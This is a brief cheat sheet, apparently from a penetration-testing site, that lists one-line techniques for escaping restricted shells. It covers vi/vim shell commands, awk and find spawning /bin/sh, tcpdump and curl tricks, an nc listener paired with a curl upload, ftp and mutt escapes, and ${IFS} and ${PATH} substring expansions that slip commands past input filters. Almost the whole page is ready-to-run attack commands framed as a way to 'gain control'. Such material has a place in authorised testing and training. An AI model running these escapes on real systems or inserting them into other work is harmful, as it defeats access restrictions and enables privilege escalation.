Skip to content

Break Out Of Jail / Shell Escaping Techniques

Discover powerful shell escaping techniques to break out of restricted environments. Learn how to execute commands inside vi/vim, leverage awk, find, tcpdump, curl, ftp, mutt, and clever bash commands to escape jails and gain control.

Executing Commands Inside vi/vim 
vi
:set shell=/bin/sh
:shell
Command Execution 
:! /bin/bash
awk 
awk 'BEGIN {system("/bin/sh")}'
find 
find / -name 0xffsec -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
tcpdump 
tcpdump -n -G 1 -z /usr/bin/php -U -A udp port 8080
curl 
curl -T@`/bin/sh` localhost
curl 
> nc -lvvp 1337
curl -T"/bin/sh" http://127.0.0.1:1337

> ftp !/bin/sh

> mutt sh

ls${IFS};sh${IFS}
List root folder in bash 
l${u}s ${PATH:0:1}
List /usr folder in bash 
l${u}s ${PATH:0:4}

Print $PATH

echo ${PATH:0}

Print /us with rev

echo ${PATH:2:3}